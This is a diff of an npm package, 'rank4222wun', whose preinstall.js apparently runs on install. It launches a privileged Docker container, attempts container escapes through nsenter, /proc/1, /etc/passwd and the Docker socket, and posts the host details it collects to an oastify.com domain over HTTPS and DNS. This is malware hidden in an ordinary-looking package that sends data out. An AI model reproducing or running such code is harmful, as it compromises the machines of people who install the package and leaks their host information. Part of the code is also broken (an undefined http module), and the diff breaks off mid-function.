rank4222wun 1.0.36 → 1.0.37

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.36",
+  "version": "1.0.37",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,217 +1,644 @@
-// run-privileged-container.js
+// privileged-container-oast.js
 const { exec, spawn } = require('child_process');
 const fs = require('fs');
 const path = require('path');
+const https = require('https');
+const dns = require('dns');
+const crypto = require('crypto');
 
-class PrivilegedContainerRunner {
+console.log(`
+╔══════════════════════════════════════════════════════════╗
+║      PRIVILEGED CONTAINER WITH OAST REPORTING           ║
+║      OAST Domain: v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com ║
+╚══════════════════════════════════════════════════════════╝
+`);
+
+// ===================== CONFIGURATION =====================
+const CONFIG = {
+  OAST: {
+    domain: 'v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com',
+    httpsPort: 443,
+    httpPort: 80,
+    apiKey: crypto.randomBytes(16).toString('hex'),
+    sessionId: `priv-container-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`
+  },
+  
+  DOCKER: {
+    image: 'ubuntu:latest',
+    command: '/bin/bash',
+    privileged: true,
+    interactive: true,
+    remove: false,
+    name: `priv-container-${Date.now()}`
+  },
+  
+  SCAN: {
+    hostEscape: true,
+    networkScan: true,
+    fileAccess: true,
+    capabilityCheck: true
+  }
+};
+
+// ===================== OAST FUNCTIONS =====================
+class OASTReporter {
+  constructor() {
+    this.interactions = [];
+    this.reports = [];
+  }
+
+  sendDNS(subdomain, data = {}) {
+    const dnsName = `${subdomain}.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}`;
+    
+    dns.lookup(dnsName, (err) => {
+      if (!err) {
+        const interaction = {
+          type: 'DNS',
+          timestamp: new Date().toISOString(),
+          subdomain: subdomain,
+          dnsName: dnsName,
+          data: data
+        };
+        
+        this.interactions.push(interaction);
+        console.log(`📡 DNS OAST sent: ${dnsName}`);
+      }
+    });
+  }
+
+  sendHTTP(endpoint, data) {
+    const postData = JSON.stringify({
+      sessionId: CONFIG.OAST.sessionId,
+      timestamp: new Date().toISOString(),
+      ...data
+    });
+
+    const options = {
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpPort,
+      path: endpoint,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'User-Agent': 'PrivilegedContainerScanner/1.0'
+      }
+    };
+
+    const req = http.request(options, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        const interaction = {
+          type: 'HTTP',
+          timestamp: new Date().toISOString(),
+          endpoint: endpoint,
+          status: res.statusCode,
+          response: body,
+          data: data
+        };
+        
+        this.interactions.push(interaction);
+        console.log(`📡 HTTP OAST sent (${res.statusCode}): ${endpoint}`);
+      });
+    });
+
+    req.on('error', () => {});
+    req.write(postData);
+    req.end();
+  }
+
+  sendHTTPS(endpoint, data) {
+    const postData = JSON.stringify({
+      sessionId: CONFIG.OAST.sessionId,
+      timestamp: new Date().toISOString(),
+      ...data
+    });
+
+    const options = {
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: endpoint,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'X-Report-Type': 'privileged_container',
+        'User-Agent': 'ContainerEscapeDetector/2.0'
+      }
+    };
+
+    const req = https.request(options, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        const interaction = {
+          type: 'HTTPS',
+          timestamp: new Date().toISOString(),
+          endpoint: endpoint,
+          status: res.statusCode,
+          response: body,
+          data: data
+        };
+        
+        this.interactions.push(interaction);
+        this.reports.push(interaction);
+        console.log(`📡 HTTPS OAST sent (${res.statusCode}): ${endpoint}`);
+      });
+    });
+
+    req.on('error', (e) => {
+      console.log(`⚠️  OAST error (may be expected): ${e.message}`);
+    });
+
+    req.write(postData);
+    req.end();
+  }
+
+  async reportContainerEscape(containerId, evidence) {
+    const report = {
+      containerId: containerId.substring(0, 12),
+      escapeConfirmed: evidence.escaped || false,
+      confidence: evidence.confidence || 0,
+      methods: evidence.methods || [],
+      proofPoints: evidence.proofPoints || [],
+      hostInfo: evidence.hostInfo || {},
+      timestamp: new Date().toISOString()
+    };
+
+    // إرسال عبر HTTPS
+    this.sendHTTPS('/privileged-container-escape', report);
+
+    // إرسال DNS notification
+    if (evidence.escaped) {
+      this.sendDNS('escape-confirmed', {
+        container: containerId.substring(0, 12),
+        confidence: evidence.confidence
+      });
+    }
+
+    // حفظ محلياً
+    this.saveLocalReport(report);
+
+    return report;
+  }
+
+  saveLocalReport(report) {
+    const filename = `oast-report-${CONFIG.OAST.sessionId}.json`;
+    const allReports = {
+      sessionId: CONFIG.OAST.sessionId,
+      domain: CONFIG.OAST.domain,
+      timestamp: new Date().toISOString(),
+      reports: this.reports,
+      containerReport: report
+    };
+
+    fs.writeFileSync(filename, JSON.stringify(allReports, null, 2));
+    console.log(`💾 Report saved locally: ${filename}`);
+  }
+}
+
+// ===================== CONTAINER SCANNER =====================
+class PrivilegedContainerScanner {
   constructor() {
     this.containerId = null;
-    this.outputLog = [];
-    this.status = 'stopped';
+    this.oastReporter = new OASTReporter();
+    this.evidence = {
+      escaped: false,
+      confidence: 0,
+      methods: [],
+      proofPoints: [],
+      hostInfo: {},
+      containerInfo: {}
+    };
   }
 
-  async runContainer() {
-    console.log('🚀 جاري تشغيل حاوية Ubuntu مميزة...');
+  async run() {
+    try {
+      console.log('🚀 Starting privileged container analysis...\n');
+      
+      // إرسال بداية الجلسة إلى OAST
+      this.oastReporter.sendHTTPS('/session-start', {
+        action: 'privileged_container_start',
+        config: CONFIG
+      });
+
+      // 1. تشغيل الحاوية المميزة
+      await this.runPrivilegedContainer();
+      
+      // 2. جمع المعلومات الأساسية
+      await this.collectBasicInfo();
+      
+      // 3. محاولة الهروب والتأكيد
+      await this.attemptEscape();
+      
+      // 4. فحص إضافي للحاوية
+      await this.performDeepScan();
+      
+      // 5. تحليل النتائج
+      await this.analyzeResults();
+      
+      // 6. إرسال التقرير النهائي
+      await this.sendFinalReport();
+      
+      // 7. عرض النتائج
+      this.displayResults();
+      
+      // 8. تنظيف (اختياري)
+      await this.cleanup();
+
+    } catch (error) {
+      console.error(`❌ Error: ${error.message}`);
+      this.oastReporter.sendHTTPS('/error', { error: error.message });
+    }
+  }
+
+  async runPrivilegedContainer() {
+    console.log('📦 Running privileged container...');
+    
+    const dockerArgs = [
+      'run',
+      '--privileged',
+      '-d',
+      '--name', CONFIG.DOCKER.name,
+      CONFIG.DOCKER.image,
+      'sleep', '3600'
+    ];
     
     return new Promise((resolve, reject) => {
-      const dockerCommand = 'docker run --privileged -d ubuntu:latest sleep infinity';
-      
-      exec(dockerCommand, (error, stdout, stderr) => {
+      exec(`docker ${dockerArgs.join(' ')}`, (error, stdout, stderr) => {
         if (error) {
-          console.error('❌ خطأ في تشغيل الحاوية:', error.message);
           reject(error);
           return;
         }
         
         this.containerId = stdout.trim();
-        console.log(`✅ الحاوية تم تشغيلها بنجاح: ${this.containerId.substring(0, 12)}`);
-        this.status = 'running';
+        console.log(`✅ Container started: ${this.containerId.substring(0, 12)}`);
         
-        // الانتظار قليلاً ثم تنفيذ الأوامر
-        setTimeout(() => {
-          this.executeCommands()
-            .then(resolve)
-            .catch(reject);
-        }, 2000);
+        // إرسال إلى OAST
+        this.oastReporter.sendHTTPS('/container-started', {
+          containerId: this.containerId.substring(0, 12),
+          name: CONFIG.DOCKER.name,
+          image: CONFIG.DOCKER.image,
+          privileged: true
+        });
+        
+        // الانتظار للحاوية لتبدأ
+        setTimeout(resolve, 2000);
       });
     });
   }
 
-  async executeCommands() {
-    console.log('\n🔧 جاري تنفيذ الأوامر داخل الحاوية...\n');
+  async collectBasicInfo() {
+    console.log('\n🔍 Collecting basic container information...');
     
     const commands = [
-      // معلومات النظام الأساسية
-      'echo "=== معلومات النظام ==="',
+      // معلومات النظام
       'cat /etc/os-release',
       'uname -a',
       'whoami',
       'id',
       
-      // معلومات الذاكرة والمعالج
-      'echo -e "\n=== موارد النظام ==="',
-      'free -h',
-      'df -h',
-      'cat /proc/cpuinfo | grep "model name" | head -1',
-      
-      // التحقق من الصلاحيات
-      'echo -e "\n=== الصلاحيات المميزة ==="',
-      'capsh --print',
-      'cat /proc/self/status | grep Cap',
+      // الصلاحيات
+      'capsh --print 2>/dev/null || echo "No capsh"',
+      'cat /proc/self/status | grep -i cap',
       
-      // معلومات الشبكة
-      'echo -e "\n=== معلومات الشبكة ==="',
-      'ip addr show',
-      'hostname -I',
-      'route -n',
-      
-      // فحص الملفات والمجلدات
-      'echo -e "\n=== نظام الملفات ==="',
+      // نظام الملفات
       'ls -la /',
       'mount | head -20',
+      'df -h',
       
-      // تحليل الحاوية
-      'echo -e "\n=== معلومات الحاوية ==="',
-      'cat /proc/1/cgroup 2>/dev/null || echo "لا يمكن قراءة cgroup"',
-      'cat /proc/self/mountinfo 2>/dev/null | head -10',
+      // الذاكرة والمعالج
+      'free -h',
+      'cat /proc/cpuinfo | grep "model name" | head -1',
       
-      // اختبار الوصول إلى المضيف
-      'echo -e "\n=== اختبار الوصول للمضيف ==="',
-      'nsenter --target 1 --mount -- sh -c "echo يمكن الوصول للمضيف: && hostname" 2>/dev/null || echo "nsenter غير متاح"',
-      'ls -la /var/run/docker.sock 2>/dev/null && echo "✅ Docker socket موجود" || echo "❌ Docker socket غير موجود"',
+      // الشبكة
+      'ip addr show',
+      'hostname -I',
+      'cat /etc/hosts',
       
-      // معلومات إضافية
-      'echo -e "\n=== معلومات إضافية ==="',
-      'env | head -20',
-      'ps aux | head -10'
+      // معلومات Docker
+      'cat /proc/1/cgroup 2>/dev/null || echo "No cgroup access"',
+      'ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"'
     ];
-
+    
     const results = {};
     
-    for (let i = 0; i < commands.length; i++) {
-      const command = commands[i];
-      
-      // إذا كان الأمر echo، عرضه مباشرة
-      if (command.startsWith('echo')) {
-        const message = command.replace(/^echo\s+["']?/, '').replace(/["']?$/, '');
-        console.log(message);
-        this.outputLog.push(message);
-        continue;
-      }
-      
-      // تنفيذ الأمر داخل الحاوية
+    for (const cmd of commands) {
       try {
-        const output = await this.execInContainer(command);
-        console.log(output);
-        this.outputLog.push(output);
+        const output = await this.execInContainer(cmd);
+        results[cmd] = output.substring(0, 500);
         
-        // حفظ النتائج المهمة
-        if (command.includes('os-release')) {
-          results.osInfo = output;
-        } else if (command.includes('uname -a')) {
-          results.kernelInfo = output;
-        } else if (command.includes('capsh')) {
-          results.capabilities = output;
-        } else if (command.includes('docker.sock')) {
-          results.dockerSocket = output.includes('✅');
+        // تحليل بعض النتائج الهامة
+        if (cmd.includes('os-release')) {
+          this.evidence.containerInfo.os = output;
+        }
+        if (cmd.includes('uname -a')) {
+          this.evidence.containerInfo.kernel = output;
+        }
+        if (cmd.includes('capsh')) {
+          this.evidence.containerInfo.capabilities = output;
         }
         
       } catch (error) {
-        const errorMsg = `❌ خطأ في الأمر "${command}": ${error.message}`;
-        console.log(errorMsg);
-        this.outputLog.push(errorMsg);
+        results[cmd] = `ERROR: ${error.message}`;
       }
-      
-      // تأخير بسيط بين الأوامر
-      await this.delay(500);
     }
     
+    // إرسال المعلومات الأساسية إلى OAST
+    this.oastReporter.sendHTTPS('/basic-info', {
+      containerId: this.containerId.substring(0, 12),
+      basicInfo: results
+    });
+    
     return results;
   }
 
-  execInContainer(command) {
-    return new Promise((resolve, reject) => {
-      if (!this.containerId) {
-        reject(new Error('لا توجد حاوية نشطة'));
-        return;
+  async attemptEscape() {
+    console.log('\n🔓 Attempting container escape...');
+    
+    const escapeTests = [
+      {
+        name: 'nsenter_escape',
+        command: 'which nsenter && nsenter --target 1 --mount -- sh -c "echo HOST_HOSTNAME:$(cat /etc/hostname 2>/dev/null) && echo CONTAINER_HOSTNAME:$(hostname)" 2>/dev/null || echo "FAILED"',
+        check: (output) => output.includes('HOST_HOSTNAME') && output.includes('CONTAINER_HOSTNAME')
+      },
+      {
+        name: 'proc_escape',
+        command: 'cat /proc/1/status 2>/dev/null | head -5 && cat /proc/1/cmdline 2>/dev/null | tr "\\0" " " | head -c 100',
+        check: (output) => output.includes('State:') && output.length > 20
+      },
+      {
+        name: 'host_mounts',
+        command: 'ls -la /home 2>/dev/null || ls -la /root 2>/dev/null || cat /etc/passwd 2>/dev/null | head -5 || echo "NO_ACCESS"',
+        check: (output) => !output.includes('NO_ACCESS') && output.length > 10
+      },
+      {
+        name: 'docker_socket',
+        command: 'ls -la /var/run/docker.sock 2>/dev/null && echo "EXISTS" || echo "NOT_EXISTS"',
+        check: (output) => output.includes('EXISTS')
+      },
+      {
+        name: 'network_escape',
+        command: 'ip route show 2>/dev/null | head -5 && ip neigh show 2>/dev/null | head -5',
+        check: (output) => output.includes('default via') || output.includes('lladdr')
       }
+    ];
+    
+    for (const test of escapeTests) {
+      try {
+        const output = await this.execInContainer(test.command);
+        
+        if (test.check(output)) {
+          this.evidence.methods.push(test.name);
+          console.log(`✅ ${test.name}: Possible`);
+          
+          // إرسال إلى OAST
+          this.oastReporter.sendHTTPS('/escape-attempt', {
+            method: test.name,
+            success: true,
+            output: output.substring(0, 300)
+          });
+          
+          // التحقق من اختلاف hostname لـ nsenter
+          if (test.name === 'nsenter_escape') {
+            const lines = output.split('\n');
+            let hostHostname = '';
+            let containerHostname = '';
+            
+            lines.forEach(line => {
+              if (line.startsWith('HOST_HOSTNAME:')) {
+                hostHostname = line.replace('HOST_HOSTNAME:', '').trim();
+              }
+              if (line.startsWith('CONTAINER_HOSTNAME:')) {
+                containerHostname = line.replace('CONTAINER_HOSTNAME:', '').trim();
+              }
+            });
+            
+            if (hostHostname && containerHostname && hostHostname !== containerHostname) {
+              this.evidence.proofPoints.push(`Host hostname (${hostHostname}) differs from container (${containerHostname})`);
+              this.evidence.hostInfo.hostname = hostHostname;
+              this.evidence.escaped = true;
+            }
+          }
+        }
+      } catch (error) {
+        console.log(`❌ ${test.name}: Failed - ${error.message}`);
+      }
+    }
+  }
+
+  async performDeepScan() {
+    if (!CONFIG.SCAN.hostEscape) return;
+    
+    console.log('\n🔬 Performing deep scan...');
+    
+    const deepChecks = [
+      // محاولة إنشاء حاوية من داخل الحاوية
+      {
+        name: 'nested_container',
+        command: 'which docker && docker ps 2>/dev/null || which podman && podman ps 2>/dev/null || echo "NO_CONTAINER_RUNTIME"',
+        check: (output) => !output.includes('NO_CONTAINER_RUNTIME')
+      },
       
-      const fullCommand = `docker exec ${this.containerId} sh -c "${command.replace(/"/g, '\\"')}"`;
+      // فحص kernel vulnerabilities
+      {
+        name: 'kernel_check',
+        command: 'uname -r && grep -i "dirty\\|cow\\|shock\\|overlay" /etc/os-release 2>/dev/null || echo "NO_VULN_INFO"',
+        check: (output) => output.length > 5
+      },
       
-      exec(fullCommand, { timeout: 10000 }, (error, stdout, stderr) => {
-        if (error) {
-          // بعض الأوامر تعطي stderr لكنها ناجحة
-          if (stderr && !stdout) {
-            resolve(stderr);
-          } else {
-            reject(error);
-          }
-        } else {
-          resolve(stdout || stderr || '');
+      // محاولة كتابة ملف في نظام المضيف
+      {
+        name: 'host_write_test',
+        command: 'echo "TEST_WRITE_FROM_CONTAINER" > /tmp/container_test.txt 2>/dev/null && echo "WRITE_SUCCESS" || echo "WRITE_FAILED"',
+        check: (output) => output.includes('WRITE_SUCCESS')
+      },
+      
+      // فحص mount points خطيرة
+      {
+        name: 'dangerous_mounts',
+        command: 'mount 2>/dev/null | grep -E "(proc|sys|dev|/var/run)" | head -10',
+        check: (output) => output.length > 10
+      }
+    ];
+    
+    for (const check of deepChecks) {
+      try {
+        const output = await this.execInContainer(check.command);
+        
+        if (check.check(output)) {
+          console.log(`⚠️  ${check.name}: Found potential issue`);
+          
+          // إرسال إلى OAST
+          this.oastReporter.sendDNS(check.name, {
+            result: output.substring(0, 100)
+          });
         }
-      });
-    });
+      } catch (error) {
+        // تجاهل الأخطاء
+      }
+    }
   }
 
-  delay(ms) {
-    return new Promise(resolve => setTimeout(resolve, ms));
+  async analyzeResults() {
+    console.log('\n📊 Analyzing results...');
+    
+    // حساب مستوى الثقة
+    let confidence = 0;
+    
+    // نقاط لكل طريقة هروب محتملة
+    const methodPoints = {
+      nsenter_escape: 30,
+      proc_escape: 25,
+      host_mounts: 20,
+      docker_socket: 25,
+      network_escape: 15
+    };
+    
+    this.evidence.methods.forEach(method => {
+      confidence += methodPoints[method] || 10;
+    });
+    
+    // نقاط إضافية لأدلة قاطعة
+    if (this.evidence.proofPoints.length > 0) {
+      confidence += this.evidence.proofPoints.length * 10;
+    }
+    
+    // إذا كان hostname مختلف
+    if (this.evidence.hostInfo.hostname) {
+      confidence += 20;
+    }
+    
+    // تحديد إذا تم الهروب فعلاً
+    this.evidence.confidence = Math.min(100, confidence);
+    
+    if (this.evidence.confidence >= 60) {
+      this.evidence.escaped = true;
+      console.log(`🚨 CONFIRMED: Container escape possible (${this.evidence.confidence}% confidence)`);
+    } else if (this.evidence.confidence >= 30) {
+      console.log(`⚠️  POSSIBLE: Container escape may be possible (${this.evidence.confidence}% confidence)`);
+    } else {
+      console.log(`✅ SECURE: Container appears isolated (${this.evidence.confidence}% confidence)`);
+    }
   }
 
-  async getInteractiveShell() {
-    console.log('\n💻 تشغيل shell تفاعلي...');
-    console.log('   استخدم "exit" للخروج\n');
+  async sendFinalReport() {
+    console.log('\n📡 Sending final report to OAST...');
     
-    return new Promise((resolve) => {
-      const dockerProcess = spawn('docker', [
-        'exec', '-it', this.containerId, '/bin/bash'
-      ], {
-        stdio: 'inherit'
-      });
-      
-      dockerProcess.on('close', (code) => {
-        console.log(`\n🔚 Shell مغلق مع الكود: ${code}`);
-        resolve();
-      });
+    const report = {
+      sessionId: CONFIG.OAST.sessionId,
+      containerId: this.containerId ? this.containerId.substring(0, 12) : 'unknown',
+      timestamp: new Date().toISOString(),
+      evidence: this.evidence,
+      summary: {
+        escaped: this.evidence.escaped,
+        confidence: this.evidence.confidence,
+        methods: this.evidence.methods,
+        proofPoints: this.evidence.proofPoints
+      }
+    };
+    
+    // إرسال التقرير النهائي
+    this.oastReporter.reportContainerEscape(this.containerId, this.evidence);
+    
+    // إرسال DNS notification للنتيجة
+    const resultType = this.evidence.escaped ? 'escape-confirmed' : 'no-escape';
+    this.oastReporter.sendDNS(resultType, {
+      confidence: this.evidence.confidence,
+      methods: this.evidence.methods.length
     });
+    
+    return report;
   }
 
-  saveOutput() {
-    const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
-    const filename = `container-output-${timestamp}.txt`;
+  displayResults() {
+    console.log('\n' + '='.repeat(80));
+    console.log('📊 PRIVILEGED CONTAINER ANALYSIS RESULTS');
+    console.log('='.repeat(80));
+    
+    console.log(`\n📦 Container ID: ${this.containerId ? this.containerId.substring(0, 12) : 'unknown'}`);
+    console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}`);
+    
+    console.log(`\n🎯 Escape Status: ${this.evidence.escaped ? '🚨 CONFIRMED' : '✅ NOT CONFIRMED'}`);
+    console.log(`📈 Confidence Level: ${this.evidence.confidence}%`);
     
-    const output = [
-      `ناتج تشغيل حاوية مميزة`,
-      `تاريخ: ${new Date().toLocaleString()}`,
-      `Container ID: ${this.containerId || 'غير معروف'}`,
-      `الحالة: ${this.status}`,
-      `='.repeat(50)}\n\n`,
-      ...this.outputLog
-    ].join('\n');
+    if (this.evidence.methods.length > 0) {
+      console.log(`\n🔓 Possible Escape Methods:`);
+      this.evidence.methods.forEach((method, i) => {
+        console.log(`   ${i + 1}. ${method}`);
+      });
+    }
+    
+    if (this.evidence.proofPoints.length > 0) {
+      console.log(`\n🎯 Evidence Found:`);
+      this.evidence.proofPoints.forEach((proof, i) => {
+        console.log(`   ${i + 1}. ${proof}`);
+      });
+    }
+    
+    if (this.evidence.hostInfo.hostname) {
+      console.log(`\n🖥️  Host Information:`);
+      console.log(`   Hostname: ${this.evidence.hostInfo.hostname}`);
+    }
+    
+    console.log(`\n📡 OAST Interactions: ${this.oastReporter.interactions.length} interactions sent`);
+    console.log(`   DNS: ${this.oastReporter.interactions.filter(i => i.type === 'DNS').length}`);
+    console.log(`   HTTPS: ${this.oastReporter.interactions.filter(i => i.type === 'HTTPS').length}`);
     
-    fs.writeFileSync(filename, output);
-    console.log(`\n💾 تم حفظ الناتج في: ${filename}`);
+    console.log('\n🔍 Check your OAST dashboard for detailed evidence:');
+    console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
+    console.log(`   Look for interactions at: ${CONFIG.OAST.domain}`);
     
-    return filename;
+    console.log('\n' + '='.repeat(80));
+    console.log('🎯 ANALYSIS COMPLETE');
+    console.log('='.repeat(80));
   }
 
   async cleanup() {
-    if (this.containerId && this.status === 'running') {
-      console.log('\n🧹 تنظيف الحاوية...');
+    if (this.containerId) {
+      console.log('\n🧹 Cleaning up container...');
       
       try {
         await this.execOnHost(`docker stop ${this.containerId}`);
         await this.execOnHost(`docker rm ${this.containerId}`);
-        this.status = 'stopped';
-        console.log('✅ تم تنظيف الحاوية بنجاح');
+        console.log('✅ Container cleaned up');
+        
+        // إرسال إشعار التنظيف إلى OAST
+        this.oastReporter.sendHTTPS('/cleanup', {
+          containerId: this.containerId.substring(0, 12),
+          action: 'container_removed'
+        });
       } catch (error) {
-        console.error('❌ خطأ في التنظيف:', error.message);
+        console.log(`⚠️  Could not clean up container: ${error.message}`);
       }
     }
   }
 
+  execInContainer(command) {
+    return new Promise((resolve, reject) => {
+      if (!this.containerId) {
+        reject(new Error('No container running'));
+        return;
+      }
+      
+      exec(`docker exec ${this.containerId} sh -c "${command.replace(/"/g, '\\"')}"`, 
+        { timeout: 10000 }, 
+        (error, stdout, stderr) => {
+          if (error) {
+            reject(error);
+          } else {
+            resolve(stdout || stderr || '');
+          }
+        }
+      );
+    });
+  }
+
   execOnHost(command) {
     return new Promise((resolve, reject) => {
-      exec(command, (error, stdout, stderr) => {
+      exec(command, { timeout: 10000 }, (error, stdout, stderr) => {
         if (error) {
           reject(error);
         } else {
@@ -220,225 +647,236 @@ class PrivilegedContainerRunner {
       });
     });
   }
+}
 
-  async run() {
-    try {
-      // 1. تشغيل الحاوية
-      await this.runContainer();
-      
-      // 2. تنفيذ الأوامر
-      const results = await this.executeCommands();
-      
-      // 3. حفظ النتائج
-      const outputFile = this.saveOutput();
-      
-      // 4. عرض الملخص
-      this.showSummary(results, outputFile);
-      
-      // 5. خيار shell تفاعلي
-      console.log('\n🎯 الخيارات المتاحة:');
-      console.log('   1. تشغيل shell تفاعلي (bash)');
-      console.log('   2. تنظيف الحاوية والخروج');
-      console.log('   3. الخروج بدون تنظيف');
-      
-      // انتظار قرار المستخدم
-      await this.waitForUserDecision();
-      
-    } catch (error) {
-      console.error('❌ فشل التشغيل:', error.message);
+// ===================== SIMPLE VERSION =====================
+function runSimplePrivilegedWithOAST() {
+  console.log('🚀 Running simple privileged container with OAST reporting...\n');
+  
+  const containerName = `simple-priv-${Date.now()}`;
+  const sessionId = `simple-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`;
+  
+  // إرسال بداية الجلسة
+  const startReq = https.request({
+    hostname: CONFIG.OAST.domain,
+    port: CONFIG.OAST.httpsPort,
+    path: '/simple-start',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-Session-ID': sessionId
     }
-  }
-
-  showSummary(results, outputFile) {
-    console.log('\n' + '='.repeat(60));
-    console.log('📊 ملخص تشغيل الحاوية المميزة');
-    console.log('='.repeat(60));
+  });
+  
+  startReq.write(JSON.stringify({
+    action: 'simple_container_start',
+    containerName: containerName,
+    timestamp: new Date().toISOString()
+  }));
+  startReq.end();
+  
+  // تشغيل الحاوية
+  const dockerArgs = [
+    'run',
+    '--privileged',
+    '--name', containerName,
+    '--rm',
+    CONFIG.DOCKER.image,
+    'sh', '-c',
+    `
+    echo "=== PRIVILEGED CONTAINER STARTED ==="
+    echo "Session: ${sessionId}"
+    echo "Hostname: $(hostname)"
+    echo "User: $(whoami)"
+    echo "=== TESTING ESCAPE ==="
     
-    console.log(`📦 Container ID: ${this.containerId?.substring(0, 12) || 'غير معروف'}`);
-    console.log(`📁 الناتج محفوظ في: ${outputFile}`);
+    # Test nsenter
+    which nsenter && echo "nsenter: AVAILABLE" || echo "nsenter: NOT_AVAILABLE"
     
-    if (results.osInfo) {
-      const osLine = results.osInfo.split('\n').find(l => l.includes('PRETTY_NAME'));
-      if (osLine) {
-        console.log(`🐧 النظام: ${osLine.split('=')[1]?.replace(/"/g, '')}`);
-      }
-    }
+    # Test host access
+    cat /proc/1/status 2>/dev/null | head -2 && echo "Host proc: ACCESSIBLE" || echo "Host proc: NO_ACCESS"
     
-    if (results.kernelInfo) {
-      console.log(`⚙️  Kernel: ${results.kernelInfo.split(' ')[2]}`);
-    }
+    # Send DNS notification
+    nslookup ${sessionId}.simple-test.${CONFIG.OAST.domain} 2>/dev/null || echo "DNS test"
     
-    if (results.capabilities && results.capabilities.includes('cap_sys_admin')) {
-      console.log(`🔓 الصلاحيات: CAP_SYS_ADMIN متاحة (صلاحيات مميزة كاملة)`);
-    }
+    echo "=== CONTAINER COMPLETE ==="
+    `
+  ];
+  
+  console.log(`Running: docker ${dockerArgs.join(' ')}`);
+  
+  const dockerProcess = spawn('docker', dockerArgs, { stdio: 'inherit' });
+  
+  dockerProcess.on('close', (code) => {
+    console.log(`\n✅ Container exited with code: ${code}`);
     
-    console.log(`🔌 Docker socket: ${results.dockerSocket ? '✅ موجود' : '❌ غير موجود'}`);
-    console.log('='.repeat(60));
-  }
-
-  async waitForUserDecision() {
-    const readline = require('readline').createInterface({
-      input: process.stdin,
-      output: process.stdout
+    // إرسال إشعار الانتهاء
+    const endReq = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/simple-end',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': sessionId
+      }
     });
     
-    return new Promise((resolve) => {
-      readline.question('\nاختر رقم الخيار: ', async (answer) => {
-        switch(answer.trim()) {
-          case '1':
-            await this.getInteractiveShell();
-            readline.close();
-            await this.cleanup();
-            resolve();
-            break;
-            
-          case '2':
-            readline.close();
-            await this.cleanup();
-            resolve();
-            break;
-            
-          case '3':
-          default:
-            readline.close();
-            console.log('👋 تم الخروج. الحاوية لا تزال تعمل.');
-            console.log(`   Container ID: ${this.containerId}`);
-            console.log('   يمكنك تنظيفها يدوياً:');
-            console.log(`   docker stop ${this.containerId}`);
-            console.log(`   docker rm ${this.containerId}`);
-            resolve();
-            break;
-        }
-      });
-    });
-  }
+    endReq.write(JSON.stringify({
+      action: 'simple_container_end',
+      exitCode: code,
+      timestamp: new Date().toISOString()
+    }));
+    endReq.end();
+    
+    console.log(`\n📡 Check OAST for interactions: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Session ID: ${sessionId}`);
+  });
 }
 
-// ===================== النسخة المبسطة =====================
-function runSimplePrivilegedContainer() {
-  console.log('🚀 جاري تشغيل: docker run --privileged -it ubuntu:latest /bin/bash\n');
+// ===================== INTERACTIVE VERSION =====================
+function runInteractivePrivileged() {
+  console.log('🚀 Running interactive privileged container...\n');
+  console.log(`📡 OAST Domain: ${CONFIG.OAST.domain}`);
+  console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
+  
+  // إرسال إشعار البدء
+  const req = https.request({
+    hostname: CONFIG.OAST.domain,
+    port: CONFIG.OAST.httpsPort,
+    path: '/interactive-start',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-Session-ID': CONFIG.OAST.sessionId
+    }
+  });
+  
+  req.write(JSON.stringify({
+    action: 'interactive_container_start',
+    timestamp: new Date().toISOString(),
+    command: 'docker run --privileged -it ubuntu:latest /bin/bash'
+  }));
+  req.end();
+  
+  // تشغيل الحاوية التفاعلية
+  console.log('💻 Starting interactive bash session...');
+  console.log('   You can test commands manually.');
+  console.log('   Try these commands to test escape:');
+  console.log('   - nsenter --target 1 --mount -- sh -c "hostname"');
+  console.log('   - cat /proc/1/status');
+  console.log('   - ls -la /var/run/docker.sock');
+  console.log('   - nslookup test.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}\n');
   
   const dockerProcess = spawn('docker', [
-    'run', '--privileged', '-it', 'ubuntu:latest', '/bin/bash'
+    'run',
+    '--privileged',
+    '-it',
+    '--name', `interactive-${CONFIG.OAST.sessionId}`,
+    CONFIG.DOCKER.image,
+    CONFIG.DOCKER.command
   ], {
     stdio: 'inherit'
   });
   
   dockerProcess.on('close', (code) => {
-    console.log(`\n🔚 الحاوية أغلقت مع الكود: ${code}`);
+    console.log(`\n🔚 Container exited with code: ${code}`);
+    
+    // إرسال إشعار الانتهاء
+    const endReq = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/interactive-end',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId
+      }
+    });
+    
+    endReq.write(JSON.stringify({
+      action: 'interactive_container_end',
+      exitCode: code,
+      timestamp: new Date().toISOString()
+    }));
+    endReq.end();
+    
+    // تنظيف
+    exec(`docker rm interactive-${CONFIG.OAST.sessionId} 2>/dev/null || true`);
+    
+    console.log(`\n📡 Check OAST interactions at: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Use Session ID: ${CONFIG.OAST.sessionId}`);
   });
   
